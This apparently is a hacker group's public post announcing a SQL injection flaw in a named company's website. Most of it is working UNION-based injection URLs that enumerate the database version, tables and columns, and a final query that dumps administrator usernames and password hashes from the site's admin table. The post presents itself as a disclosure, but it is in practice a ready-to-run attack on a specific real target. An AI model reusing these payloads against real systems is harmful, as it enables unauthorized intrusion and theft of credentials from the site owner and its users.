PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)> has reported another critical SQL Injection (vulnerability) on owned by KMD Group of Companies

These are some information from Vulneral Site :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href=";Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">;Action=3&amp;ipar=-1%20union%20all%20select</a>


<a href=";Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">;Action=3&amp;ipar=-1%20union%20all%20select</a>


<a href=";Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href=";Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

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